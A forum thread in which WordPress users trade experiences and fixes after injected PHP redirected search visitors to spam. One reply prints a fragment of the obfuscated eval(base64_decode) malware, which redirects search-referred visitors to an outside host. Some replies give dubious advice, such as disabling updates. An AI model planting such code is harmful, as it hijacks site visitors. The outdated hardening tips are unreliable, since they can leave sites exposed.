All of my wordpress sites hacked! Are yours?

66 replies
Last week, someone injected malicious PHP code into my wordpress sites. I fixed it, but now I see the same hacker is going at it at other people's site. I just took a peek at a client's server (not on mine, totally different) and they did it there too!

What it does is that when a visitor comes from google, it redirects to spam. When someone visits your site by the URL, it goes to your site like normal.

Has this happened to you?

This is how I fixed it:
First, you should ask your host if they have backups. If they do, get one. Second, you want to make sure to make a copy of wp-config.php and save it to your desktop. also make sure to save your uploads folder. then what i did was deleted every file in my site and reinstalled wp manually. then i uploaded my uploads folder. when you install wp again, use all the details from the wp-config

you'll need a backup of your theme to reupload in the new install. if you wont have one, see if your host has a backup of your site.


I think this happens because of an outdated wp install and outdated plugins.

This is a serious thing guys!!
#hacked #sites #wordpress
  • Profile picture of the author HarrieB
    you should use backup buddy plugin to have a back up of all your data.
    make sure your wordpress is updated
    you should change your wp-login password often!!
    there is a plugin -wp security scan you can use that to find any code/injections inside your wordpress!
    {{ DiscussionBoard.errors[5542850].message }}
  • Profile picture of the author Entrecon
    I had someone suggest a tool that could be used on PHP driven sites. It was on another forum where someone had been hacked. I am not familiar with the tool, but it might be worth checking out:
    http://www.spambotsecurity.com/zbblock.php
    Signature

    Visit My website http://kipferguson.com

    {{ DiscussionBoard.errors[5542891].message }}
  • Profile picture of the author SteveJohnson
    Nicole, don't want to scare you - but just be aware that some of the latest exploits involving WordPress were due to a thumbnail creation script called TimThumb.

    The problem is that the uploaded bad script sometimes gets stored in ... you guessed it! ... the wp-content/uploads folder (the cache folder could be in several places, though, including your theme folder). So your [not-so-]complete wipe and replacement of files may not have been quite enough.

    IF the source of your trouble originally was the TimThumb problem, the nasty little critter might still be hidden in one of your wp-content folders. Look for folders named 'cache', and delete their contents.
    Signature

    The 2nd Amendment, 1789 - The Original Homeland Security.

    Gun control means never having to say, "I missed you."

    {{ DiscussionBoard.errors[5543214].message }}
    • Profile picture of the author Ord Allenbea
      This has happened for a long time and will continue to happen. Wordpress is open source and because the source is viewable by any and all it will always be a target.

      None of my blogs have ever been hacked though as I make sure to secure them. There are many ways to secure your blog, do a search on google for wordpress security.
      {{ DiscussionBoard.errors[5543334].message }}
    • Profile picture of the author Michael Fereday
      Thanks Nicole, and Steve Johnson for the tips.
      Signature

      Like Dogs? Come see us to Get Daily Heart, Soul and Fun for The Dog Lover in You! http://www.facebook.com/PuppyDogDaily ; http://www.PuppyDogDaily.com

      {{ DiscussionBoard.errors[5660096].message }}
    • Profile picture of the author jennyo
      Originally Posted by SteveJohnson View Post

      Nicole, don't want to scare you - but just be aware that some of the latest exploits involving WordPress were due to a thumbnail creation script called TimThumb.

      The problem is that the uploaded bad script sometimes gets stored in ... you guessed it! ... the wp-content/uploads folder (the cache folder could be in several places, though, including your theme folder). So your [not-so-]complete wipe and replacement of files may not have been quite enough.

      IF the source of your trouble originally was the TimThumb problem, the nasty little critter might still be hidden in one of your wp-content folders. Look for folders named 'cache', and delete their contents.
      Yes, the malware is in wp-config. It's in all your plugins (all index.php throughout site), throughout themes folder in functions, header, footer, sidebar, single etc. etc. it might be eval code.

      It looks like this: eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlc nNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSR fU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWR VJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCml mICghc3RyaXN0cigkdWFnLCJNU0lFIDcuMCIpKXsKaWYgKHN0c mlzdHIoJHJlZmVyZXIsInlhaG9vIikgb3Igc3RyaXN0cigkcmV mZXJlciwiYmluZyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInJhb WJsZXIiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJnb2dvIikgb3I gc3RyaXN0cigkcmVmZXJlciwibGl2ZS5jb20iKW9yIHN0cmlzd HIoJHJlZmVyZXIsImFwb3J0Iikgb3Igc3RyaXN0cigkcmVmZXJ lciwibmlnbWEiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ3ZWJhb HRhIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYmVndW4ucnUiKSB vciBzdHJpc3RyKCRyZWZlcmVyLCJzdHVtYmxldXBvbi5jb20iK SBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaXQubHkiKSBvciBzdHJ pc3RyKCRyZWZlcmVyLCJ0aW55dXJsLmNvbSIpIG9yIHByZWdfb WF0Y2goIi95YW5kZXhcLnJ1XC95YW5kc2VhcmNoXD8oLio/KVwmbHJcPS8iLCRyZWZlcmVyKSBvciBwcmVnX21hdGNoICgiL2 dvb2dsZVwuKC4qPylcL3VybFw/c2EvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibX lzcGFjZS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWNl Ym9vay5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJhb2wuY2 9tIikpIHsNCmlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUi KSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7DQpoZW FkZXIoIkxvY2F0aW9uOiBodHRwOi8vaGluaWEuenlucy5jb20v Iik7DQpl


      Even if you find and delete all of that hackers put backdoors so they simply come back and do the same thing.


      I'm still doing research and looking for a permanent solution.
      {{ DiscussionBoard.errors[6602588].message }}
  • Profile picture of the author traficmaster
    i can recommend backup buddy too
    {{ DiscussionBoard.errors[5543407].message }}
  • Profile picture of the author typoo999
    My sites are still alive. I use wordpress for every sites.
    Signature
    Boom shakalaka!
    {{ DiscussionBoard.errors[5543412].message }}
    • Profile picture of the author Karen Blundell
      WordPress is a great tool, but like all tools, it needs care.

      So my advise to all WordPress users:
      Update, Update, Update, secure, secure, secure, backup, backup, backup!

      Signature
      ---------------
      {{ DiscussionBoard.errors[5543492].message }}
      • Profile picture of the author trevpen
        Originally Posted by Karen Blundell View Post

        WordPress is a great tool, but like all tools, it needs care.

        So my advise to all WordPress users:
        Update, Update, Update, secure, secure, secure, backup, backup, backup!

        Good advice! As always, prevention is better than cure...
        {{ DiscussionBoard.errors[5543636].message }}
  • Profile picture of the author Abhi.garg
    No ! its not happen with me ! My sites are still alive on wordpress & my blogs are also still alive.
    {{ DiscussionBoard.errors[5543723].message }}
  • Profile picture of the author wuken
    It used to happen to me before
    generally it is because some files have loose read/write permission. And hackers are able to exploit wp plugins which have upload facility. Just keep track of those plugins with upload function particularly.
    {{ DiscussionBoard.errors[5543811].message }}
  • Profile picture of the author sodevious
    It seems that the problem is timthumb. ugh
    {{ DiscussionBoard.errors[5548241].message }}
  • Profile picture of the author Istvan Horvath
    - No, it has never happened to me. Which doesn't mean it can't ever happen. It can...
    - All the automatic backup things that some ignorant people are pushing in this thread will do NOTHING good if you are going to install and install and install again and again the same corrupt (damaged) files. Why would you do that?
    - Unless you know exactly which files have been damaged... don't put back any saved files before making sure they are safe
    - Oh, and don't forget: the malicious code can be even in your database (that wasn't touched in the scenario described above)

    If you are not sure how to check everything - this is the time when hiring a pro to look through your files could be well worth the money spent.
    Signature

    {{ DiscussionBoard.errors[5548330].message }}
  • Profile picture of the author Tim Franklin
    Interesting thread, and some varying opinions on what may or may not be to blame, the trouble with that approach is that when you ASSume you know what that means.

    I would be very concerned about an issue like this because I would want to make sure it never happened again or at least take as many steps as you can to prevent it from happening, which means from time to time, changing the salt and nonce keys in your config file.

    As well never, ever, use An auto script installer to install wordpress, which I have seen many (so called Gurus) recommend, I laugh when I see that kind of behavior because I know right away they don't know a thing about what they are trying to sell me.

    By all means take all the precautions you can, but also be smart about it, dont assume you know what caused the problem until you actually know it, its sort of like working on a car, that has a bad spark plug, until you find out which one of those spark plugs is bad, your going to continue to have a problem.

    Find the problem and fix it, Oh and one more thing,

    Dont blame a plugin it is never a plugins fault, because all plugins operate on PHP, which mean if you have a problem its on the machine your website is installed on, look up Linux security sessions, or talk to your host, about their security problem.
    Signature
    Bitcoin | Crypto | Blockchain Secrets |
    {{ DiscussionBoard.errors[5548366].message }}
  • Profile picture of the author Ord Allenbea
    @Tim some plugins have been known to have some not so friendly code in them.

    With that said if you own a wordpress blog here are some tips for you. Again I secure all mine and never been hacked. I use no plugins for security at all.

    1. Make sure your server has php suexec installed (this blocks the need for 777 permissions and blocks php injections).

    2. If you do not have php suexec then make sure your permissions are not 777 on any file.

    3. Make sure all folders contain a blank index.php to block anyone from viewing the files in those folders.

    4. Change the prefix on your database - some may need a coder to do this. Do not attempt if you do not understand databases.

    5. Disable any and all "auto updates". You do not have to update your blog just because a new release is out. Many times this could be a huge mistake, if it is not broken don't fix it!

    6. Admin approval should be required for any and all comments and registrations.

    7. Change your wp-admin folder name - again you may need a coder for this if you do not know what you doing.

    8. Change your plugin folder name - again you may need a coder for this if you do not know what you doing.

    9. Remove the WP version from your headers. You should be able to edit the template files from admin. Locate the header and you will see code that specifies wp version, remove it.

    10. You could take a step further and add password protection to your admin folder by using .htaccess to password protect the folder. You will have to login twice now in order to access admin but little extra security never hurts.
    {{ DiscussionBoard.errors[5548845].message }}
    • Profile picture of the author Kingfish85
      Originally Posted by Ord Allenbea View Post

      @Tim some plugins have been known to have some not so friendly code in them.

      With that said if you own a wordpress blog here are some tips for you. Again I secure all mine and never been hacked. I use no plugins for security at all.

      1. Make sure your server has php suexec installed (this blocks the need for 777 permissions and blocks php injections).

      2. If you do not have php suexec then make sure your permissions are not 777 on any file.

      3. Make sure all folders contain a blank index.php to block anyone from viewing the files in those folders.

      4. Change the prefix on your database - some may need a coder to do this. Do not attempt if you do not understand databases.

      5. Disable any and all "auto updates". You do not have to update your blog just because a new release is out. Many times this could be a huge mistake, if it is not broken don't fix it!

      6. Admin approval should be required for any and all comments and registrations.

      7. Change your wp-admin folder name - again you may need a coder for this if you do not know what you doing.

      8. Change your plugin folder name - again you may need a coder for this if you do not know what you doing.

      9. Remove the WP version from your headers. You should be able to edit the template files from admin. Locate the header and you will see code that specifies wp version, remove it.

      10. You could take a step further and add password protection to your admin folder by using .htaccess to password protect the folder. You will have to login twice now in order to access admin but little extra security never hurts.
      These are good points. I will add to them though,

      Your wp-config file should ABSOLUTELY be moved out of your public_html directory.

      Use Login Lockdown

      Remove the password reset
      Signature

      |~| VeeroTech Hosting - sales @ veerotech.net
      |~| High Performance CloudLinux & LiteSpeed Powered Web Hosting
      |~| cPanel & WHM - Softaculous - Website Builder - R1Soft - SpamExperts
      |~| Visit us @veerotech Facebook - Twitter - LinkedIn

      {{ DiscussionBoard.errors[5557198].message }}
  • Profile picture of the author sodevious
    @tim, I most certainly think it can be a plugins fault. Being coded in PHP just gives it that much more power over your entire wp site
    {{ DiscussionBoard.errors[5557092].message }}
  • Profile picture of the author webfighter
    Yes, I had three of my blogs hacked. It was tim thumb back then.

    This plugin helped me in cleaning up:
    WordPress › Timthumb Vulnerability Scanner « WordPress Plugins
    {{ DiscussionBoard.errors[5557259].message }}
  • Profile picture of the author Sojourn
    Originally Posted by sodevious View Post

    What it does is that when a visitor comes from google, it redirects to spam. When someone visits your site by the URL, it goes to your site like normal.
    This, by the way, sounds very much like the Google Redirect virus which is not a WordPress issue. Based on the steps you took and what you saw in your client's server, it does sound like you know for sure that your issue was injected code but in case anyone runs across this post in the future, there are other issues that could cause redirects to spam besides a WordPress plug-in.

    Glad you got it fixed. Keeping WordPress safe is no small issue and shouldn't be overlooked. I know I don't use an autoinstall script anymore, store my own backups, lock my admin and login screens, hide my files and take a few other precautions and I still worry. Posts like this always remind me to check my sites again to make sure everything is still in place.
    {{ DiscussionBoard.errors[5557664].message }}
  • Profile picture of the author Davan
    9 out of 10 of mine all hacked last month. Sad part: it's taken a couple of years to get this far. While I have two up now the 10th went down last week. Rebuilt the most recent from the ground up via a paid for premium template. Updated all plugins, themes, framework and new database. It was up for two whole days before going down again. Still trying to recover and reminding myself, what dosen't kill me makes me stronger.

    Thanks for the insight.
    Signature

    "No one succeeds alone." unknown
    "Knowing is not enough; we must apply. Willing is not enough; we must do." Johann von Goethe
    "There are no stupid people, only different levels of ignorance." me

    {{ DiscussionBoard.errors[5601341].message }}
    • Profile picture of the author Kim Phoenix
      I had two sites that recently were hacked too. I was notified by a visitor to my site that she was getting warnings by her Norton antivirus. I contacted my hosting company with the information she provided me, and the hosting company was able to remove the malicious content. They got in through an outdated timthumb.php file. So you need to get the updated timthumb.php file here.

      My sites were still functioning though, so don't assume that because your sites are running, that they have not been hacked. You can try a free scan at Securi, but sometimes it has false positives.

      Also, like others have mentioned, always keep your WP versions and plugins current.
      Signature
      http://www.BuyHealthPLR.com (PLR Written & Edited by a Healthcare Professional)

      http://www.TheOnlineChick.com

      {{ DiscussionBoard.errors[5601385].message }}
      • Profile picture of the author Ord Allenbea
        Keeping up to date does not correct the issue of hacking, if anything it escalates the problem. All hackers have access to the code as it is released and they work on new ways to hack the new version.

        I have blogs that still run 2.5 and 2.7 but as posted above they are secured because I secured them myself. Only plugins I use are those that I trust and are built properly (not by some free plugin builder).

        Originally Posted by Kim Phoenix View Post

        I had two sites that recently were hacked too. I was notified by a visitor to my site that she was getting warnings by her Norton antivirus. I contacted my hosting company with the information she provided me, and the hosting company was able to remove the malicious content. They got in through an outdated timthumb.php file. So you need to get the updated timthumb.php file here.

        My sites were still functioning though, so don't assume that because your sites are running, that they have not been hacked. You can try a free scan at Securi, but sometimes it has false positives.

        Also, like others have mentioned, always keep your WP versions and plugins current.
        {{ DiscussionBoard.errors[5601450].message }}
  • Profile picture of the author chow
    Tim thumb got me too. What a headache. Hope you get it all squared away.
    {{ DiscussionBoard.errors[5601416].message }}
  • Profile picture of the author fin
    I use some security plug-ins. Since I installed them, I regularly get e-mails telling me someone has tried to hack into my site.

    I guess it's just robots.
    {{ DiscussionBoard.errors[5601543].message }}
  • Profile picture of the author WriterWahm
    It's happened to me twice! First time there was no backup and I lost everything!!! Then it also happened again - was a New Year's gift in fact. But I backup these days and I'm very careful what plugins I install. Thanks for the tips you shared. And I know to avoid TimThumb (had it on my sites at first.)
    Signature

    PM me if you want a romantic fiction ghostwriter.

    {{ DiscussionBoard.errors[5601568].message }}
  • Profile picture of the author Ord Allenbea
    For those that seem to be missing this - http://www.warriorforum.com/main-int...ml#post5548845

    Changing your passwords do not help when wordpress has issues itself, they do not need your admin password to hack your wordpress. Login lockdown does not stop any hackers because again they do not need your admin password.

    Read the above thread because that is the way to secure wordpress.

    One more thing to add - if you do not have php suexec installed on your server then make sure no file permissions are 777.
    {{ DiscussionBoard.errors[5601695].message }}
  • Profile picture of the author Valdor Kiebach
    You can also get your websites infected with malware from your own computer.
    This happens when you use FTP and your computer has a virus that will then alter any index.xxx pages on any site you FTP to.

    I had this happen to me and a quick (actually slow) full AVG scan, antimalware scan and spybot scan of my computer cured the problem.

    Also changing the permission on all index.xxx files to 444 helped.
    {{ DiscussionBoard.errors[5601812].message }}
  • Profile picture of the author BudgetSEO
    Originally Posted by sodevious View Post

    Last week, someone injected malicious PHP code into my wordpress sites. I fixed it, but now I see the same hacker is going at it at other people's site. I just took a peek at a client's server (not on mine, totally different) and they did it there too!

    What it does is that when a visitor comes from google, it redirects to spam. When someone visits your site by the URL, it goes to your site like normal.

    Has this happened to you?

    This is how I fixed it:
    First, you should ask your host if they have backups. If they do, get one. Second, you want to make sure to make a copy of wp-config.php and save it to your desktop. also make sure to save your uploads folder. then what i did was deleted every file in my site and reinstalled wp manually. then i uploaded my uploads folder. when you install wp again, use all the details from the wp-config

    you'll need a backup of your theme to reupload in the new install. if you wont have one, see if your host has a backup of your site.

    I think this happens because of an outdated wp install and outdated plugins.

    This is a serious thing guys!!
    Wrong, it can be moved to a different location on the server itself.
    Also there are some other files which needs to be secured to make your site somewhat immune to those injections.
    Never depend on your host for a backup, have your own parachute if you've to jump mid-air, your host won't bat for you .
    Signature
    Let me Secure your wordpress website for the price of a small Pizza
    Weather Balloons Election Supplies
    If you need the ''cheapest'' quote, don't waste your time contacting me.
    {{ DiscussionBoard.errors[5659085].message }}
  • Profile picture of the author WillR
    Originally Posted by Richard Odell View Post

    What's the betting you installed wordpress from cpanel?
    A number of you said this... can I ask why this is the case?

    I don't use much Wordpress but just curious. Is it just because they use the same database prefix and admin as the username or are there other reasons?
    {{ DiscussionBoard.errors[5659161].message }}
    • Profile picture of the author BudgetSEO
      Originally Posted by WillR View Post

      A number of you said this... can I ask why this is the case?

      I don't use much Wordpress but just curious. Is it just because they use the same database prefix and admin as the username or are there other reasons?
      The database prefix is the same for fantastico installs, can be changed with a bit of tweaking the SQL Database.

      As for the admin username, you get to choose that during install.

      The fantastico follows a pattern, leaves footprints making the hackers job easy.

      A manual install is much better,

      To make it simple,
      Would you prefer spending 25 extra minutes while you are installing the script and sleep peacefully for the time to come?
      OR
      Would you prefer taking a shortcut and face nightmares just because you used the shortcut?
      Signature
      Let me Secure your wordpress website for the price of a small Pizza
      Weather Balloons Election Supplies
      If you need the ''cheapest'' quote, don't waste your time contacting me.
      {{ DiscussionBoard.errors[5659226].message }}
      • Profile picture of the author WillR
        Originally Posted by BudgetSEO View Post

        The database prefix is the same for fantastico installs, can be changed with a bit of tweaking the SQL Database.

        As for the admin username, you get to choose that during install.

        The fantastico follows a pattern, leaves footprints making the hackers job easy.

        A manual install is much better,

        To make it simple,
        Would you prefer spending 25 extra minutes while you are installing the script and sleep peacefully for the time to come?
        OR
        Would you prefer taking a shortcut and face nightmares just because you used the shortcut?
        Thanks, yes I know about the username and database prefixes, that's what I already mentioned, but I am wanting to know what the other reason(s) are for not using it, if any.

        Leaves footprints doesn't really tell me much. What footprints exactly? Are we just guessing here or do we know what the exact issues are?

        Anyone else have an idea?

        I'm all for it (security) and use a full wordpress security setup myself but I'm wanting to know what the exact reason for not doing a fantastico install is.
        {{ DiscussionBoard.errors[5659235].message }}
        • Profile picture of the author BudgetSEO
          Originally Posted by WillR View Post

          Thanks, yes I know about the username and database prefixes, that's what I already mentioned, but I am wanting to know what the other reason(s) are for not using it, if any.

          Leaves footprints doesn't really tell me much. What footprints exactly? Are we just guessing here or do we know what the exact issues are?

          Anyone else have an idea?

          I'm all for it (security) and use a full wordpress security setup but I'm wanting to know what the exact reason for not doing a fantastico in stall are.
          Fantastico install leaves a .txt file where you install the wordpress (root), potential risk as fantastico asks you keep that file intact and has the same filename.

          I don't see any other security risks as of now, but honestly, if you do a fantastico install better do the security measures, change DB Prefix etc., rather than waiting for someone to take over your site to give you the message.

          I've sent you a PM since you are interested in security.

          Best,
          -BudgetSEO
          Signature
          Let me Secure your wordpress website for the price of a small Pizza
          Weather Balloons Election Supplies
          If you need the ''cheapest'' quote, don't waste your time contacting me.
          {{ DiscussionBoard.errors[5659256].message }}
  • Profile picture of the author tim_buchalka
    Here is a general lowdown on how hackers find websites to hack.

    They look for specific versions of wordpress that have been identified with flaws, or plugins that have also been identified.

    It's very easy to see what version you are running of both of these (footprints). As outlined by BudgetSEO above fantastico installs leave a .txt file which is something else for hackers to look for.

    Many exploits are based on old versions of wordpress - The long you do not upgrade the greater the chance of being hacked.

    Backups of course are important. But here is something else that is easy to do and can help.

    Create a new user for your blog and give it Admin privileges. Then remove the Admin privilege from your existing Admin account.

    Because many exploits looks to hack the Admin account - so if they succeed they have no power to do anything.

    Remember that a lot of hackers are not very smart - They are just using scripts they have found online - These look for the above exploits so if you can fix those up you are much more likely to be safe and secure.

    Sorry to hear about your story! Hope its all smooth sailing from now on.
    {{ DiscussionBoard.errors[5659293].message }}
    • Profile picture of the author BudgetSEO
      Originally Posted by tim_buchalka View Post

      Here is a general lowdown on how hackers find websites to hack.

      They look for specific versions of wordpress that have been identified with flaws, or plugins that have also been identified.

      It's very easy to see what version you are running of both of these (footprints). As outlined by BudgetSEO above fantastico installs leave a .txt file which is something else for hackers to look for.

      Many exploits are based on old versions of wordpress - The long you do not upgrade the greater the chance of being hacked.

      Backups of course are important. But here is something else that is easy to do and can help.

      Create a new user for your blog and give it Admin privileges. Then remove the Admin privilege from your existing Admin account.

      Because many exploits looks to hack the Admin account - so if they succeed they have no power to do anything.

      Remember that a lot of hackers are not very smart - They are just using scripts they have found online - These look for the above exploits so if you can fix those up you are much more likely to be safe and secure.

      Sorry to hear about your story! Hope its all smooth sailing from now on.
      There's a plugin available to change the username, afaik its WPVN Username Change

      You are correct, most of them download some software and hit the button to hijack sites that have holes, without knowing what they are doing and who is been hijacked.

      If you are running on an older version of wordpress, boy you are hanging on a thread, if you know what that means .

      Version 2.9.2 had many holes, also timthumb script if left unattended can cause your site to be injected with some nasty codes.

      The best bet is to,
      1 - Secure your site
      2 - Take frequent backups
      3 - Upgrade to the latest version of the core files and plugins
      4 - Never download any plugin thats outside the WP Repository
      5 - Always stay updated with the latest hacks and hijacks, make sure your website doesn't have those holes
      Signature
      Let me Secure your wordpress website for the price of a small Pizza
      Weather Balloons Election Supplies
      If you need the ''cheapest'' quote, don't waste your time contacting me.
      {{ DiscussionBoard.errors[5659326].message }}
  • Profile picture of the author meltingwaves
    Ah I feel for you. A few weeks back my sites all got hacked and the hacking was dirtyyyyyyy, all over the place, not concealed to one area. I wiped all my sites out and drew up plans to make them twice as effective when I relaunch them. After you get them cleaned up, invest in some security. Worth every penny.
    {{ DiscussionBoard.errors[5660133].message }}
  • Profile picture of the author sara121
    So sad to hear about your sites but my all websites are safe.
    {{ DiscussionBoard.errors[5660245].message }}
  • Profile picture of the author revstan
    My Wp-blogs are totally fine. Up and running, making money.


    Simple Stan
    {{ DiscussionBoard.errors[5660260].message }}
  • Profile picture of the author hassan001
    Intruders are always looking for new ways in a script to hack.... Its not hard for serious database programmers to inject sql and get their desired information.... Many government sites have hacked, intelligence agencies sites have hacked in pasts, banks got hacked and alot more....

    So you can't force to stop anyone but you can take measures from your side for your satisfaction to keep things smooth...

    I am a big fan of wordpress and I have alot of blogs and websites on wordpress but seriously pay attention to this point....

    "Its not hard for a hacker to hack your cpanel too :p" So I advise everyone to keep daily or if not daily then weekly backup of your websites/blogs and don't put worthy information in easily viewed directories....

    That's all I can do on my side at least

    May God prevent us all from serious hackers.....
    {{ DiscussionBoard.errors[5660271].message }}
  • Profile picture of the author digitalquilluk
    Please, please, please everyone who uses wordpress install WP Firewall plugin...

    Many other methods to secure Wordpress i.e. htaccess file written to stop certain types of files being uploaded etc etc, but everyone who uses Wordpress should install the WP Firewall and login lockdown plugins, they really do help in these types of cases.
    {{ DiscussionBoard.errors[5660564].message }}
  • Profile picture of the author ebuyer123
    Hi there,

    I got the below email from my host about my hacked wordpress sites on Thesis premium theme.

    My QUESTIONs are: What files and folders on my websites should I delete/update? How to check the verson of "timthumb.php" on my sites?

    MAIL FROM MY HOSTING COMPANY:

    We have found and corrected exploitable timthumb.php file(s) on your hosting account, which are listed below:

    /home1/myhostaccount/public_html/mysitename1/wp-content/themes/thesis_182/lib/scripts/thumb.php
    /home1/myhostaccount/public_html/mysitename2/wp-content/themes/thesis_183/lib/scripts/thumb.php

    While we have corrected these files, we do recommend you ensure all potential exploits are corrected on your account.

    This is best done by updating all scripts, plugins, modules and themes on your account to the latest version.
    Thank you for your helps
    {{ DiscussionBoard.errors[5836082].message }}
    • Profile picture of the author BudgetSEO
      Originally Posted by ebuyer123 View Post

      Hi there,

      I got the below email from my host about my hacked wordpress sites on Thesis premium theme.

      My QUESTIONs are: What files and folders on my websites should I delete/update? How to check the verson of "timthumb.php" on my sites?



      Thank you for your helps
      You were using an older version on timthumb which is insecure and allowed the hacker to do his job.
      Signature
      Let me Secure your wordpress website for the price of a small Pizza
      Weather Balloons Election Supplies
      If you need the ''cheapest'' quote, don't waste your time contacting me.
      {{ DiscussionBoard.errors[5836162].message }}
      • Profile picture of the author ebuyer123
        Originally Posted by BudgetSEO View Post

        You were using an older version on timthumb which is insecure and allowed the hacker to do his job.
        Thank you for your comment. My hosting company already told me about the older version of timthumb file. Can your wp security service solve the problem for me?

        Do I still need to update the timthumb.php files since my hosting company said they have corrected these files on my websites?

        How to check the version of my [/B]timthumb.php[/B] file?

        Anything else (e.g. to delete files/folders etc.) should I do to make my site clean as before?

        Cheers!
        {{ DiscussionBoard.errors[5836195].message }}
        • Profile picture of the author BudgetSEO
          Originally Posted by ebuyer123 View Post

          Thank you for your comment. My hosting company already told me about the older version of timthumb file.

          Do I still need to update the timthumb.php files since my hosting company said they have corrected these files on my websites?

          How to check the version of my [/B]timthumb.php[/B] file by the way?

          Anything else (e.g. to delete files/folders etc.) should I do to make my site clean as before?

          Cheers!
          Check this thread - http://www.warriorforum.com/warriors...g-us-10-a.html

          Am not trying to be pushy, or asking you to buy that service, its only to make you aware of it.

          If you PM me your website link, I'll let you know if its still vulnerable to being attacked.

          If I don't have the website URL, its as good as shooting bullets in the dark expecting to score kills.

          There are various parameters and holes that need to be filled, since every website is designed in a different way, there isn't a general rule which is fully applicable to all of them.
          Signature
          Let me Secure your wordpress website for the price of a small Pizza
          Weather Balloons Election Supplies
          If you need the ''cheapest'' quote, don't waste your time contacting me.
          {{ DiscussionBoard.errors[5836207].message }}
  • Profile picture of the author ebuyer123
    Many thanks for your comments and suggestions.
    It turned out to be the "false positive" from the auto scans done by my host's security system.
    Cheers!
    {{ DiscussionBoard.errors[5847880].message }}
    • Profile picture of the author sherys
      I checked my site yesterday, and thought it'd been hacked. I contacted Hostgator who got it back for me, and also told me it had come from malware on my computer. Now, when I go into wp-admin, I can't make any changes there. I have been running Antimalware on my computer today, but not sure what to do about the wp-admin problem.
      {{ DiscussionBoard.errors[5854032].message }}
      • Profile picture of the author ebuyer123
        Originally Posted by sherys View Post

        I checked my site yesterday, and thought it'd been hacked. I contacted Hostgator who got it back for me, and also told me it had come from malware on my computer. Now, when I go into wp-admin, I can't make any changes there. I have been running Antimalware on my computer today, but not sure what to do about the wp-admin problem.
        Can you disable (or rename) all the plugins via FTP access?
        Then try again to see if you can login and use the wp dashboard.

        Good luck!
        {{ DiscussionBoard.errors[5858197].message }}
      • Profile picture of the author Rudy Hermawan
        Originally Posted by sherys View Post

        I checked my site yesterday, and thought it'd been hacked. I contacted Hostgator who got it back for me, and also told me it had come from malware on my computer. Now, when I go into wp-admin, I can't make any changes there. I have been running Antimalware on my computer today, but not sure what to do about the wp-admin problem.
        Hi Sherys,

        Most of the recent attack to wordpress site are coming from the outdate timthumb code used by plugin or theme.

        The problem is that not all of the plugin have the update information, so we never know about the problem.

        Fortunately my hosting provider which is bluehost are aware of this and doing a scan to our site and automatically upgrade it.

        If you had problem after login to wp-admin, you might try to disable the theme or plugin. You could login to your cpanel, activate the file manager, go to your /wp-content/themes/, look for the themes and rename the themes folder name.

        Try to login again to wp-admin, if the problem still exist. Using the file manager go to the wp-content/plugins and rename some plugins folder name.

        If wordpress could not found the themes or plugin, wordpress will disable them.

        Please do this at your own risk. Doing it wrong will make damage to your wordpress and unrecoverable in the future.
        {{ DiscussionBoard.errors[6607365].message }}
  • Profile picture of the author Cataclysm1987
    Originally Posted by sodevious View Post

    What it does is that when a visitor comes from google, it redirects to spam. When someone visits your site by the URL, it goes to your site like normal.
    Tricky spammers.

    I've definitely had them do this before. The site doesn't appear hacked. You think you clicked a bad link or something. Then you revisit the site and you go, oh hey, it's fine! I'm at my site.

    No, you're still hacked.
    Signature

    No signature here today!

    {{ DiscussionBoard.errors[5857053].message }}
  • Profile picture of the author bighostchennai
    My Wordpress sites were hacked when ever put it in forum and sites like fiverr for demo.. this happens because, some sites having very weak password like 12345 or name etc.,easily hackable, always create a password having letters, numbers and character combination. There are software to hack password, it will hack easily weak passwords, so be careful when you create password.
    {{ DiscussionBoard.errors[5857104].message }}
    • Profile picture of the author BackLinkiT
      The obvious (and slightly controversial) answer, surely, is not to use Wordpress?

      I wouldn't touch it with a bargepole!
      {{ DiscussionBoard.errors[6594621].message }}
    • Profile picture of the author whitworldwide
      Interesting thread.

      I've had 7 of my 9 sites hacked. All my pages displayed the same page, which displayed that it had been hacked.

      I have removed the hack by updating WP version and the plugins, but for two of the sites this has been unsuccessful.

      Does anyone have any ideas on what to do to fix the last two sites?
      {{ DiscussionBoard.errors[6604826].message }}
      • Profile picture of the author Kingfish85
        Originally Posted by whitworldwide View Post

        Interesting thread.

        I've had 7 of my 9 sites hacked. All my pages displayed the same page, which displayed that it had been hacked.

        I have removed the hack by updating WP version and the plugins, but for two of the sites this has been unsuccessful.

        Does anyone have any ideas on what to do to fix the last two sites?
        Yes, contact your web host. They should be able to help you. If they cannot, or can't at least point you in the right direction, it's time to move.
        Signature

        |~| VeeroTech Hosting - sales @ veerotech.net
        |~| High Performance CloudLinux & LiteSpeed Powered Web Hosting
        |~| cPanel & WHM - Softaculous - Website Builder - R1Soft - SpamExperts
        |~| Visit us @veerotech Facebook - Twitter - LinkedIn

        {{ DiscussionBoard.errors[6604835].message }}
      • Profile picture of the author andersvinther
        Originally Posted by whitworldwide View Post

        Does anyone have any ideas on what to do to fix the last two sites?
        sucuri.net are quite good!
        {{ DiscussionBoard.errors[6605612].message }}
  • Profile picture of the author AlwaysOnABHI
    My client have a similar hack and it wasn't a huge deal. hacker put a code in that Google sees and it gives them bragging rights, my guess anyway.

    When you get a new domain don't use Fantastico to install WordPress. Fantastico installs all use common factors that hackers can identify quickly. Install by uploading through files and create manually database.
    {{ DiscussionBoard.errors[6594587].message }}
  • Profile picture of the author CodeShack
    One of the common issues right now is infected plugins or themes that people are downloading.

    There is a widespread infection happening by malicious coders and sharers, when they add code to add adverts, re-direcion, content locking or malware.

    The code itself looks very innocent and will not detect as a virus or malware.
    The offsite content it fetches, after installation, when the visitor fetches your page is where the payload/content is fetched, delivered and executed.

